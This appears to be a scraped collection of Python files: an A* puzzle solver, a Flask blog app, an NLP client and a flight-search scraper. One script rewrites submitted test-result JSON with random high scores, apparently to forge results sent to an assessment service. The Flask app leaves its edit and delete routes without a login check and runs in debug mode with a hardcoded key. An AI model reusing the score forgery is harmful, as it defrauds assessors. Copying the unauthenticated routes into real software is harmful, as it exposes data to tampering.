heuristics\n\t\tself.goal = goal\n\n\tdef successor(self, state):\n\t\treturn self.problem[state]\n\nclass Node:\n\tdef __init__(self, problem, parent, state, board_state):\n\t\tself.parent = parent\n\t\tself.state = state\n\t\tself.board_state = board_state\n\t\tif parent:\n\t\t\tself.path_cost = parent.path_cost + problem.step_cost(parent.state, state)\n\t\t\tself.depth = parent.depth + 1\n\t\telse:\n\t\t\tself.path_cost = 0\n\t\t\tself.depth = 0\n\nclass Puzzle(Problem):\n\tdef __init__(self, n):\n\t\tself.n = n\n\t\tsuper().__init__(self.makeProblem(), self.generate_heuristics(), self.n_goal())\n\n\tdef makeProblem(self):\n\t\tproblem = {}\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\tproblem[(x,y)] = []\n\t\t\tif x - 1 >= 0: \n\t\t\t\tproblem[(x,y)].append((x-1,y)) \n\t\t\tif x + 1 < l: \n\t\t\t\tproblem[(x,y)].append((x+1,y))\n\t\t\tif y - 1 >= 0: \n\t\t\t\tproblem[(x,y)].append((x,y-1))\n\t\t\tif y + 1 < l: \n\t\t\t\tproblem[(x,y)].append((x,y+1))\n\t\treturn problem\n\n\tdef generate_heuristics(self):\n\t\theuristics = {}\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\theuristics[(x,y)] = {}\n\t\t\tfor j in range(self.n+1):\n\t\t\t\tx_j = j // l\n\t\t\t\ty_j = j % l\n\t\t\t\tif not (x_j == x and y_j == y):\n\t\t\t\t\theuristics[(x,y)][(x_j, y_j)] = np.abs(x - x_j) + np.abs(y - y_j)\n\t\treturn heuristics\n\n\tdef step_cost(self, p_state, state):\n\t\treturn 1\n\n\tdef n_goal(self):\n\t\tboard = []\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\tboard.append((x,y))\n\t\treturn board\n\n\tdef generate_puzzle(self):\n\t\tboard = []\n\t\tfor i in range(self.n+1):\n\t\t\tl = int(np.sqrt(self.n+1))\n\t\t\tx = i // l\n\t\t\ty = i % l\n\t\t\tboard.append((x,y))\n\t\tfor i in range(self.n*3):\n\t\t\tswap_i = np.random.randint(0, len(self.problem[board[0]]))\n\t\t\tswap = self.problem[board[0]][swap_i]\n\t\t\tfor j in range(len(board)):\n\t\t\t\tif board[j] == swap: \n\t\t\t\t\tboard[j] = board[0]\n\t\t\t\t\tboard[0] = swap\n\t\t\t\t\tbreak\n\t\treturn board\n\n\tdef print_board(self, node):\n\t\tl = int(np.sqrt(self.n+1))\n\t\tboard = np.zeros((l,l))\n\t\tfor i in range(len(node.board_state)):\n\t\t\tx, y = node.board_state[i]\n\t\t\tboard[x][y] = i\n\t\tprint(board)\n\t\treturn None\n\n\t# estimated cost\n\tdef est_cost(self, node):\n\t\tcost = 0\n\t\t# count = 0\n\t\tfor i in range(len(node.board_state)):\n\t\t\tif node.board_state[i] != self.goal[i]:\n\t\t\t\t# count += 1\n\t\t\t\tcost += self.heuristics[node.board_state[i]][self.goal[i]]\n\t\treturn cost\n\n\tdef search_square(self, node, new_state):\n\t\tnew_board_state = node.board_state.copy()\n\t\ttmp = new_board_state[0]\n\t\tnew_board_state[0] = new_state\n\t\tfor i in range(1, len(new_board_state)):\n\t\t\tif new_board_state[i] == new_state:\n\t\t\t\tnew_board_state[i] = tmp\n\t\t\t\treturn new_board_state\n\n\tdef goal_test(self, node):\n\t\treturn node.board_state == self.goal\n\n\t# need think over\n\tdef remove_first(self, fringe):\n\t\tfringe.sort(key = lambda x: self.est_cost(x) + x.path_cost)\n\t\tret = fringe[0]\n\t\tdel(fringe[0])\n\t\treturn ret\n\ndef A_search(problem, start):\n\tif start == None:\n\t\t# start = problem.generate_puzzle()\n\t\treturn None\n\tfringe = [Node(problem, None, start[0], start)]\n\twhile fringe:\n\t\tnode = problem.remove_first(fringe)\n\t\tprint(\"Traversing {}, depth: {}, estimated cost: {}\".format(node.state, 
node.depth, problem.est_cost(node)+node.path_cost))\n\t\tproblem.print_board(node)\n\t\tif problem.goal_test(node):\n\t\t\tprint(\"Puzzle solved within {} steps!\".format(node.path_cost))\n\t\t\tresult = []\n\t\t\tn = node\n\t\t\twhile n:\n\t\t\t\tresult.append(n.state)\n\t\t\t\tn = n.parent\n\t\t\tresult.reverse()\n\t\t\tprint(result)\n\t\t\treturn start, result\n\t\tfor n in problem.successor(node.state):\n\t\t\tnew_board_state = problem.search_square(node, n)\n\t\t\tfringe.append(Node(problem, node, n, new_board_state))\n\treturn None, None\n\nif __name__ == '__main__':\n\tA_search(Puzzle(8), None)\n\t# A_search(Puzzle(15))\n","sub_path":"treeSearch.py","file_name":"treeSearch.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"64330787","text":"# -*- coding: UTF-8 -*-\n\nimport json\nimport random\n\n\ndef change(input_data, length, key, mix, max):\n    for i in range(length):\n        input_data[i][key] = random.randint(mix, max)\n\n\ndef change_detail(input_data, length):\n    for i in range(length):\n        str_tmp = input_data[i][\"ansDetail\"]\n        str_pre = str_tmp[:str_tmp.find(\"#\")]\n        # print(str_pre)\n        str_sur = str_tmp[str_tmp.find(\"#\") + 1:]\n        str_score = \"\"\n        for score in str_sur.split(\",\"):\n            try:\n                if int(float(score)) < 85:\n                    int_score = float(score) + random.randint(85 - int(float(score)), 95 - int(float(score)))\n                    str_score += str(int_score) + \",\"\n                else:\n                    str_score += score + \",\"\n            except ValueError:\n                pass\n        if not str_score.endswith(\",\"):\n            str_score += \",\"\n        input_data[i][\"ansDetail\"] = str_pre + \"#\" + str_score\n\n\ndata = input(\"请输入post提交的jsonobject:\\n\")\ndata_json = json.loads(data.strip())\nlength = len(data_json)\nchange(data_json, length, \"score\", 86, 94) # 自己设置分数区间\nchange(data_json, length, \"accuracy\", 95, 98)\nchange(data_json, length, \"fluency\", 96, 100)\nchange(data_json, length, \"complete\", 96, 100)\nchange_detail(data_json, length)\nprint(json.dumps(data_json))\n\n\n\n\n\n\n","sub_path":"fuckfif.py","file_name":"fuckfif.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"520967850","text":"from flask import Flask,render_template,request,session, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nfrom datetime import datetime\nfrom werkzeug import secure_filename\nimport json\nimport os\n# please create comments dynamically, like posts; see single.html\n\nwith open('config.json','r') as c:\n    params = json.load(c)[\"params\"]\n\nlocal_server = True\napp = Flask(__name__)\napp.secret_key = 'supe-secret_key'\napp.config['UPLOAD_FOLDER'] = params['upload_location']\napp.config.update(\n    MAIL_SERVER = 'smtp.gmail.com',\n    MAIL_PORT = '465',\n    MAIL_USE_SSL = True,\n    MAIL_USERNAME = params['gmail-user'],\n    MAIL_PASSWORD = params['gmail-password']\n)\n\nmail = Mail(app)\nif(local_server):\n    app.config['SQLALCHEMY_DATABASE_URI'] = params['local_uri']\nelse:\n    app.config['SQLALCHEMY_DATABASE_URI'] = params['prod_uri']\n\n\ndb = SQLAlchemy(app)\n\nclass Contacts(db.Model):\n    srno = db.Column(db.Integer,primary_key=True)\n    name = db.Column(db.String(80), nullable=False)\n    phone_num = db.Column(db.String(12),nullable=False)\n    msg = db.Column(db.String(120),nullable=False)\n    date = db.Column(db.String(12),nullable=True)\n    email = db.Column(db.String(20) ,nullable=False)\n\nclass Comments(db.Model):\n    srno = 
db.Column(db.Integer,primary_key=True)\n    name = db.Column(db.String(80), nullable=False)\n    phone = db.Column(db.String(12),nullable=False)\n    message = db.Column(db.String(120),nullable=False)\n    date = db.Column(db.String(12),nullable=True)\n    email = db.Column(db.String(20) ,nullable=False)\n\nclass Posts(db.Model):\n    srno = db.Column(db.Integer,primary_key=True)\n    title = db.Column(db.String(80), nullable=False)\n    slug = db.Column(db.String(120),nullable=False)\n    content = db.Column(db.String(120),nullable=False)\n    date = db.Column(db.String(12),nullable=True)\n    img_file = db.Column(db.String(12), nullable=False)\n\n# the image does not get stored in the location\n@app.route(\"/uploader\", methods=[\"GET\", \"POST\"])\ndef uploader():\n    if ('user' in session and session['user'] == params['admin_user']):\n        if (request.method == 'POST'):\n            f = request.files['file1']\n            f.save(os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(f.filename)))\n            return \"Uploaded Successfully\"\n\n# next and previous button work remains in post.html, Video - 19\n@app.route(\"/post/<string:post_slug>\", methods=['GET'])\ndef post_route(post_slug):\n    post = Posts.query.filter_by(slug = post_slug).first()\n    return render_template('post.html', params=params, post = post)\n\n\"\"\"\n@app.route(\"/post\")\ndef post_route():\n    posts = Posts.query.filter_by().all()\n    return render_template('post.html', params=params, post = posts)\n\"\"\"\n# you can do this thing with single\n# not working\n@app.route(\"/getcomment\", methods = [\"GET\"])\ndef getcomment():\n    comments = Comments.query.filter_by().all()\n    return render_template('single.html', params=params, comments = comments)\n\n# not working\n@app.route(\"/delete/<string:srno>\", methods = ['GET','POST'])\ndef delete(srno):\n    post = Posts.query.filter_by(srno =srno).first()\n    db.session.delete(post)\n    db.session.commit()\n    # try to redirect to the dashboard page\n    posts = Posts.query.all()\n    return render_template('dashboard.html', params=params, posts=posts)\n\n\n\n# not working\n@app.route(\"/edit/<string:srno>\", methods = ['GET','POST'])\ndef edit(srno):\n    # this does not work: if ('user' in session and session['user'] == params['admin_user']):\n    if (request.method == 'POST'):\n        box_title = request.form.get('title')\n        slug = request.form.get('slug')\n        content = request.form.get('content')\n        img_file = request.form.get('img_file')\n        date = datetime.now()\n\n        if srno == '0':\n            post = Posts(title=box_title, slug=slug, content= content, img_file = img_file, date = date)\n            db.session.add(post)\n            db.session.commit()\n        else:\n            post = Posts.query.filter_by(srno=srno).first()\n            post.title = box_title\n            post.slug = slug\n            post.content = content\n            post.img_file = img_file\n            post.date = date\n            db.session.commit()\n        return redirect('/edit/'+srno)\n    post = Posts.query.filter_by(srno=srno).first()\n    return render_template('edit.html', params=params, post= post)\n\n@app.route('/home')\ndef home():\n    name1 = \"Flask Home page\"\n    return render_template('home.html', params=params)\n\n@app.route('/')\ndef login():\n    name1 = \"Flask Home page\"\n    return render_template('login.html', params=params)\n\n@app.route('/dashboard', methods = ['GET', 'POST'])\ndef dashboard():\n    if ('user' in session and session['user'] == params['admin_user']):\n        posts = Posts.query.all()\n        return render_template('dashboard.html', params=params, posts = posts)\n\n    if request.method == 'POST':\n        username = request.form.get('username')\n        userpass = request.form.get('password')\n        if(username == params['admin_user'] and userpass == params['admin_password']):\n            session['user'] = username\n            # 
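NOTE: the dashboard check above compares session['user'] with\n            # params['admin_user'], so the username is what gets stored; the\n            # submitted password is only compared here, never kept.\n            # 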
userpass\n posts = Posts.query.all()\n\n return render_template('dashboard.html', params=params, posts = posts)\n\n return render_template('login.html', params=params)\n\n@app.route('/logout')\ndef logout():\n session.pop('user')\n return redirect('/dashboard')\n\n\n@app.route('/portfolio')\ndef portfolio():\n name1 = \"Flask portfolio page\"\n return render_template('portfolio.html', params=params)\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact():\n title = \"Flask contact page\"\n if(request.method=='POST'):\n name = request.form.get('name')\n email = request.form.get('email')\n phone = request.form.get('phone')\n msg = request.form.get('msg')\n entry = Contacts(name = name,phone_num= phone,msg=msg, date = datetime.now(),email=email)\n db.session.add(entry)\n db.session.commit()\n mail.send_message('Hiii, New Message From ' + name, sender = email, recipients = [params['gmail-user']],\n body = msg + \"\\n\" + phone )\n return render_template('contact.html', params=params)\n\n\n@app.route(\"/comment\", methods=[\"GET\", \"POST\"])\ndef comment():\n title = \"Flask comment page\"\n if(request.method=='POST'):\n name = request.form.get('name')\n email = request.form.get('email')\n phone = request.form.get('phone')\n message = request.form.get('message')\n entry = Comments(name = name,phone= phone,message= message, date = datetime.now(),email=email)\n db.session.add(entry)\n db.session.commit()\n mail.send_message('Hiii, New Comment From ' + name, sender = email, recipients = [params['gmail-user']],\n body = message + \"\\n\" + phone )\n return render_template('single.html', params=params)\n\n\napp.run(debug=True)\n\n#app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:@localhost/first_flask_web'","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"436764373","text":"from typing import Any, List\nfrom .algorithm import Algorithm\nfrom multiprocessing.connection import Client\nimport multiprocessing as mp\nimport threading\nimport time\nimport weakref\nimport logging\nfrom ...utils.process_io import split_text_list, merge_result\n\nlogger = logging.getLogger(\"oknlp\")\n\ndef _courier(algorithm_weakref, client):\n while True:\n try:\n result_dict = client.recv()\n except EOFError:\n break\n except OSError:\n # Server stoped\n break\n \n thread_id, result, exc = result_dict['id'], result_dict['result'], result_dict[\"exception\"]\n\n self = algorithm_weakref()\n if self is None:\n # algorithm class deleted\n break\n\n with self._result_dict_lock:\n self._result_dict[thread_id]['result'] = result\n self._result_dict[thread_id][\"exception\"] = exc\n self._result_dict[thread_id]['event'].set()\n del self\n\nclass BatchAlgorithmClient(Algorithm):\n def __init__(self, address, family, server_name, split_sent):\n self.__address = address\n self.__family = family\n self.__server_name = server_name\n self.__closed = True\n self.split_sent = split_sent\n self.__reinit()\n \n def __getstate__(self):\n return (self.__address, self.__family, self.__closed, self.__server_name)\n\n def __setstate__(self, state):\n (self.__address, self.__family, self.__closed, self.__server_name) = state\n if not self.__closed:\n self.__reinit()\n\n def __reinit(self):\n logger.info(\"[Process %d %s]: Client reinit called\", mp.current_process().pid, self.__server_name)\n self._result_dict = {}\n self._result_dict_lock = threading.Lock()\n\n client_ok = False\n for 
_ in range(3):\n try:\n self.client = Client(self.__address, self.__family)\n except ConnectionRefusedError:\n time.sleep(0.5)\n else:\n client_ok = True\n break\n if not client_ok:\n raise RuntimeError(\"Failed to init client\")\n \n \n response = self.client.recv()\n if response[\"op\"] == 0:\n assert response[\"msg\"] == \"hello\"\n \n self.__closed = False\n\n logger.info(\"[Process %d %s]: Client connected\", mp.current_process().pid, self.__server_name)\n\n self.client_lock = threading.Lock() # write lock\n self.courier_thread = threading.Thread(target=_courier, args=(weakref.ref(self), self.client), daemon=True)\n self.courier_thread.start()\n \n def close(self):\n if self.__closed:\n return\n try:\n self.client.send({\"op\": 2})\n except BrokenPipeError:\n # server already exited\n pass\n self.client.close()\n\n logger.info(\"[Process %d %s]: Client disconnected\", mp.current_process().pid, self.__server_name)\n self.__closed = True\n\n def __del__(self):\n logger.info(\"[Process %d %s]: __del__ called\", mp.current_process().pid, self.__server_name)\n self.close()\n \n def __call__(self, sents : List[Any], max_length = 128):\n if self.split_sent:\n sents, is_end = split_text_list(sents, max_length)\n thread_id = threading.get_ident()\n with self._result_dict_lock:\n if thread_id not in self._result_dict:\n self._result_dict[thread_id] = {'event': threading.Event(), 'result': None}\n event = self._result_dict[thread_id]['event']\n event.clear()\n with self.client_lock:\n self.client.send({\n \"op\": 1,\n \"total_size\": len(sents),\n \"data\": sents,\n \"id\": thread_id\n })\n event.wait()\n with self._result_dict_lock:\n result = self._result_dict[thread_id]['result']\n del self._result_dict[thread_id]['result']\n exc = self._result_dict[thread_id]['exception']\n del self._result_dict[thread_id]['exception']\n if exc is not None:\n raise exc\n if self.split_sent:\n return merge_result(result, is_end)\n else:\n return result\n","sub_path":"oknlp/algorithm/abc/batch_algorithm_client.py","file_name":"batch_algorithm_client.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"197379120","text":"\"\"\"Find the flights matching given criteria on flyniki.com or other specified website\n\nThis module exports:\n - FlightsSearcher class\n - SearchError exception type\n - IATANotFoundError exception type\n\"\"\"\n\nimport re\nimport datetime\nimport json\nimport io\nimport urllib.parse\n\nimport parse\nimport requests\nimport lxml.etree\n\nclass SearchError(RuntimeError):\n \"\"\"Indicate that the website sent an error\"\"\"\n pass\n\n\nclass IATANotFoundError(RuntimeError):\n \"\"\"Indicate that given IATA-code is not found on the website\"\"\"\n pass\n\n\nclass FlightsSearcher:\n \"\"\"This class provides the 'do_search' method\n\n It's implemented with a class (instead of a single function) since we should\n keep some cached data and the Session object between several calls\n of the 'do_search' function for increasing performance and reducing\n the traffic consumption.\n \"\"\"\n def __init__(self, domain_name='flyniki.com'):\n self.req_ses = requests.Session()\n self.airports = None\n self.vacancy_url = None\n self.domain_name = domain_name\n\n def do_search(self, from_iata, to_iata, outbound_date, return_date=None):\n \"\"\"\n Do several requests to the website (flyniki.com by default) and print found flights\n :param from_iata: IATA-code of a 'from' airport\n :param to_iata: IATA-code of a 
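'to' airport\n\n        A hypothetical call, using only names defined in this module:\n\n            searcher = FlightsSearcher()\n            searcher.do_search('BER', 'LON', datetime.date(2016, 10, 27),\n                               datetime.date(2016, 11, 3))\n\n        Here 'BER' is the 'from' airport and 'LON' the 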
'to' airport\n :param outbound_date: a date object\n :param return_date: a date object (None for a oneway search)\n :return: None\n \"\"\"\n\n # Check the 'from_iata' format\n try:\n self._check_iata_code(from_iata)\n except ValueError as exception:\n raise ValueError('Wrong value of the \\'from_iata\\' argument: ' + str(exception))\n\n # Check the 'to_iata' format\n try:\n self._check_iata_code(to_iata)\n except ValueError as exception:\n raise ValueError('Wrong value of the \\'to_iata\\' argument: ' + str(exception))\n\n # Check the input dates and convert them to strings\n\n if not isinstance(outbound_date, datetime.date):\n raise ValueError('The outbound_date argument must be of the date type')\n\n outbound_date_str = outbound_date.isoformat()\n\n if return_date is None:\n return_date_str = None\n else:\n if not isinstance(return_date, datetime.date):\n raise ValueError(\n 'The return_date argument must be of the date or the NoneType type'\n )\n return_date_str = return_date.isoformat()\n\n # Convert the IATA-codes into flyniki.com's format\n from_city = self._iata_to_city_name(from_iata, 'departure')\n to_city = self._iata_to_city_name(to_iata, 'destination')\n\n # Perform search\n search_reply = self._request_flights(from_city, to_city, outbound_date_str, return_date_str)\n\n # Check that the website gave exactly what we've asked\n if not self._verify_search_results(\n search_reply,\n from_iata,\n to_iata,\n outbound_date,\n return_date\n ):\n raise RuntimeError('Mismatched sent search criteria and received ones')\n\n # Print search results\n self._print_flights(search_reply)\n\n @staticmethod\n def _check_iata_code(iata_code):\n \"\"\"Check the given IATA-code\n\n If it's valid, return True. If not, raise ValueError.\n Warning: this function doesn't guarantee that the given IATA-code exists,\n it just checks its format.\"\"\"\n\n # 1. Check for the letter count\n if len(iata_code) != 3:\n raise ValueError('IATA-code must be exactly 3 characters long')\n\n # 2. Check that only english 26 letters are used\n # 3. Check that all letters are in upper case\n if re.match(\"^[A-Z]*$\", iata_code) is None:\n raise ValueError('IATA-code must contain only A-Z letters in the upper case')\n\n return True\n\n def _request_airports(self):\n \"\"\"Make an HTTP request to the website and return lists of airports\"\"\"\n\n req_departures = self.req_ses.get(\n 'http://www.'+self.domain_name+'/en/site/json/suggestAirport.php'\n '?searchfor=departures'\n '&searchflightid=0'\n '&departures%5B%5D='\n '&destinations%5B%5D=City%2C+airport'\n '&suggestsource%5B0%5D=activeairports'\n '&withcountries=0'\n '&withoutroutings=0'\n '&promotion%5Bid%5D='\n '&promotion%5Btype%5D='\n '&get_full_suggest_list=false'\n '&routesource%5B0%5D=airberlin'\n '&routesource%5B1%5D=partner'\n )\n req_destinations = self.req_ses.get(\n 'http://www.' + self.domain_name + '/en/site/json/suggestAirport.php'\n '?searchfor=destinations'\n '&searchflightid=0'\n '&departures%5B%5D=City%2C+airport'\n '&destinations%5B%5D='\n '&suggestsource%5B0%5D=activeairports'\n '&withcountries=0'\n '&withoutroutings=0'\n '&promotion%5Bid%5D='\n '&promotion%5Btype%5D='\n '&get_full_suggest_list=false'\n '&routesource%5B0%5D=airberlin'\n '&routesource%5B1%5D=partner'\n )\n # warning: these requests don't get all known airports. 
It seems that\n # flyniki.com doesn't work with some of them\n # or there is no planned flights for the remaining airports\n\n try:\n airports = {}\n # Please note: these lists are different in about 20 airports,\n # but they have a lot of common\n airports['departures'] = tuple(req_departures.json()['suggestList'])\n airports['destinations'] = tuple(req_destinations.json()['suggestList'])\n except (json.decoder.JSONDecodeError, IndexError):\n raise RuntimeError('Bad data format from the website')\n\n return airports\n\n def _iata_to_city_name(self, iata_code, airport_type):\n\n # Request the airport lists if we don't have them yet\n if self.airports is None:\n self.airports = self._request_airports()\n\n # Get a list for the requested direction\n if airport_type == 'departure':\n airports = self.airports['departures']\n elif airport_type == 'destination':\n airports = self.airports['destinations']\n else:\n raise ValueError('Wrong airport type is supplied to the function')\n\n # Perform search\n iata_match = list(filter(lambda x: x['code'] == iata_code, airports))\n found_count = len(iata_match)\n if found_count == 0:\n raise IATANotFoundError(\n 'The requested IATA-code \\''+ iata_code +'\\' was not found on ' + self.domain_name\n )\n elif found_count == 1:\n ret = iata_match[0]['name']\n return ret\n else:\n raise RuntimeError(\n self.domain_name + ' provided at least two airports with the same IATA-code'\n )\n\n def _request_flights(self, from_city, to_city, outbound_date, return_date):\n\n if self.vacancy_url is None:\n # Get a 'sid' parameter.\n # If we try to ask the website for a search without this parameter,\n # it fails due to some 'security reasons'.\n # So, we do a request, then it sends a Location header with a new 'sid' parameter\n req = self.req_ses.get(\n 'http://www.'+self.domain_name+'/en/booking/flight/vacancy.php',\n allow_redirects=False\n )\n self.vacancy_url = \"http://www.\" + self.domain_name + req.headers['Location']\n\n if return_date is None:\n oneway_search = True\n return_date = ''\n oneway = '1'\n else:\n oneway_search = False\n oneway = ''\n\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n post_data = ('_ajax[templates][]=main'\n '&_ajax[templates][]=priceoverview'\n '&_ajax[templates][]=infos'\n '&_ajax[templates][]=flightinfo'\n '&_ajax[requestParams][departure]='+from_city+\n '&_ajax[requestParams][destination]='+to_city+\n '&_ajax[requestParams][returnDeparture]='\n '&_ajax[requestParams][returnDestination]='\n '&_ajax[requestParams][outboundDate]='+outbound_date+\n '&_ajax[requestParams][returnDate]='+return_date+\n '&_ajax[requestParams][adultCount]=1'\n '&_ajax[requestParams][childCount]=0'\n '&_ajax[requestParams][infantCount]=0'\n '&_ajax[requestParams][openDateOverview]='\n '&_ajax[requestParams][oneway]='+oneway\n )\n # This conversion is not only for [] symbols.\n # Some cities contain some non-latin symbols that are needed to be percent-encoded\n post_data = urllib.parse.quote(post_data, safe='=&_+')\n\n req = self.req_ses.post(self.vacancy_url, data=post_data, headers=headers)\n\n got_data = req.json()\n\n if 'error' in got_data:\n error_text = self._parse_a_website_error(got_data['error'])\n if 'No connections found for the entered data.' in error_text:\n # Nothing's bad. 
We just have an empty result\n found_flights = {}\n else:\n raise SearchError('The website reported the following error: ' + error_text)\n else:\n main_html = got_data['templates']['main']\n found_flights = self._parse_html_flight_tables(main_html, oneway_search)\n\n return found_flights\n\n @staticmethod\n def _parse_a_website_error(error_html):\n parser = lxml.etree.HTMLParser(recover=True)\n html_etree = lxml.etree.parse(io.StringIO(\"\" + error_html + \"\"), parser)\n error_text = html_etree.xpath('/html/body/div/div/p/text()')\n try:\n error_text = error_text[0]\n except IndexError:\n error_text = 'Unknown website error'\n return error_text\n\n @classmethod\n def _parse_html_flight_tables(cls, raw_html, oneway_flights):\n result = {}\n\n # Yes, the site's reply has broken tags (like ).\n # So, we need to use a recover mode\n parser = lxml.etree.HTMLParser(recover=True)\n html_etree = lxml.etree.parse(io.StringIO(\"\" + raw_html + \"\"), parser)\n\n check_for_results = html_etree.xpath('''\n //table[@class='flighttable']\n ''')\n if len(list(check_for_results)) < 1:\n # Nothing's found or an error occurred\n return result\n\n html_flighttables = html_etree.xpath('''\n /html/body\n /div[@id='vacancy_flighttable']\n /div[@class='wrapper']\n /div[@id='flighttables']\n ''')[0]\n\n html_outbound_table = html_flighttables.xpath('''\n div[@class=\\'outbound block\\']\n /div[@class='tablebackground']\n /table[@class='flighttable']\n ''')[0]\n\n html_outbound_table_title = html_flighttables.xpath('''\n div[@class=\\'outbound block\\']\n /div[@class='row']\n /div[@class='flight-data-date']\n /div[@class='outboundicon']\n ''')[0]\n\n result['outbound_flights_details'] = cls._parse_flight_table_details(\n html_outbound_table_title\n )\n result['outbound_flights'] = cls._parse_flight_table(html_outbound_table)\n\n if oneway_flights is False:\n html_return_table = html_flighttables.xpath('''\n div[@class=\\'return block\\']\n /div[@class='tablebackground']\n /table[@class='flighttable']\n ''')[0]\n\n html_return_table_title = html_flighttables.xpath('''\n div[@class=\\'return block\\']\n /div[@class='row']\n /div[@class='flight-data-date']\n /div[@class='returnicon']\n ''')[0]\n\n result['return_flights_details'] = cls._parse_flight_table_details(\n html_return_table_title\n )\n result['return_flights'] = cls._parse_flight_table(html_return_table)\n\n return result\n\n @classmethod\n def _parse_flight_table(cls, table_element):\n result = {}\n result['flights'] = []\n\n fare_types = cls._parse_fare_types(table_element)\n\n # Extract the flights from rows\n html_rows = table_element.xpath('''\n tbody/tr[@class='flightrow selected'] | tbody/tr[@class='flightrow']\n ''')\n for row in html_rows:\n cols = row.xpath('td')\n row_result = {}\n\n # Extract the start time\n tmp = cols[1].xpath('span/time[1]/text()')[0]\n tmp = tmp.split(':')\n row_result['start_time'] = datetime.time(int(tmp[0]), int(tmp[1]))\n\n # Extract the end time\n tmp = cols[1].xpath('span/time[2]/text()')[0]\n tmp = tmp.split(':')\n row_result['end_time'] = datetime.time(int(tmp[0]), int(tmp[1]))\n\n # Extract the end time days\n days_strong = list(cols[1].xpath('span/strong[1]/text()'))\n if len(days_strong) > 0:\n row_result['end_time_days'] = int(days_strong[0][1:])\n else:\n row_result['end_time_days'] = 0\n\n # Extract the duration\n tmp = cols[3].xpath('span[1]/text()')[0].strip()\n tmp = tmp.split('h')\n tmp_hours = int(tmp[0].strip())\n tmp = tmp[1].split('min')\n tmp_mins = int(tmp[0].strip())\n row_result['duration'] = 
datetime.timedelta(hours=tmp_hours, minutes=tmp_mins)\n\n # Extract the prices\n row_result['prices'] = cls._parse_prices(fare_types, cols)\n\n result['flights'].append(row_result)\n return result\n\n @staticmethod\n def _parse_prices(fare_types, cols):\n result = []\n for fare_type in fare_types:\n price_row = {}\n if len(cols[fare_type['column_no']].xpath('span[@class=\"notbookable\"]')) == 0:\n price_row['name'] = fare_type['name']\n price_row['currency'] = fare_type['currency']\n\n # These prices are really complicated.\n # The website usually sends two equal prices: 'lowest' and 'current'.\n # Some script on this page hides the 'lowest' one.\n # The situation is easy, we should only use the 'current' value.\n # But... sometimes there is no a 'current' value.\n # In this case script shows the 'lowest' one.\n # The solution is pretty simple: use 'lowest' in absence of 'current'.\n # But rarely, the website sends both these prices,\n # but the 'lowest' one is a bit smaller than the 'current'.\n # In this case script shows the 'current' one.\n # This code do the same things, but it also ensures that 'lowest' <= 'current'.\n\n lowest_tmp = cols[fare_type['column_no']].xpath(\n 'label[1]/div[@class=\"lowest\"]/span[1]/text()'\n )\n current_tmp = price_row['current'] = cols[fare_type['column_no']].xpath(\n 'label[1]/div[@class=\"current\"]/span[1]/text()'\n )\n\n if len(lowest_tmp) > 0:\n lowest_tmp = lowest_tmp[0]\n else:\n raise RuntimeError('The website didn\\'t send the \\'lowest\\' price value')\n\n if len(current_tmp) > 0:\n current_tmp = current_tmp[0]\n else:\n current_tmp = None\n\n if lowest_tmp is None and current_tmp is None:\n raise RuntimeError(\n 'The website didn\\'t send both the \\'lowest\\' and \\'current\\' price values'\n )\n elif lowest_tmp is not None and current_tmp is None:\n price_row['value'] = lowest_tmp\n elif lowest_tmp is not None and current_tmp is not None:\n price_row['value'] = current_tmp\n if float(lowest_tmp.replace(',', '')) > float(current_tmp.replace(',', '')):\n raise RuntimeError('The website sent wrong prices')\n else:\n raise RuntimeError('Unexpected condition')\n\n result.append(price_row)\n\n return result\n\n @staticmethod\n def _parse_fare_types(table_element):\n # Extract the fare types and currency symbols from the table's head\n # This code finds all given fare types regardless of their order and count\n fare_types_cols_offset = int(table_element.xpath('thead/tr[1]/td[1]/@colspan')[0])\n fare_types = []\n fare_types_columns = table_element.xpath('thead/tr[1]/td')\n cnt = fare_types_cols_offset\n for column in fare_types_columns[1:]: # the first column is not related to the fare types\n fare_type = {}\n\n # Extract name\n fare_type['name'] = column.xpath('div[1]/label/p/text()')[0]\n if len(fare_type['name']) == 0:\n raise RuntimeError('Wrong table head format')\n\n # Extract currency sign\n fare_type['currency'] = table_element.xpath(\n 'thead/tr[2]/th[$col]/text()',\n col=cnt\n )[0].strip()\n if len(fare_type['currency']) == 0:\n raise RuntimeError('Wrong table head format')\n\n fare_type['column_no'] = cnt\n fare_types.append(fare_type)\n cnt += 1\n return fare_types\n\n @staticmethod\n def _parse_flight_table_details(html_element):\n result = {}\n\n # Parse direction\n title = html_element.xpath('h2/text()')[0]\n # title example: ' outbound flight '\n title = title.strip().split(' ')\n if title[0] == 'outbound':\n result['direction'] = 'outbound'\n elif title[0] == 'return':\n result['direction'] = 'return'\n else:\n raise 
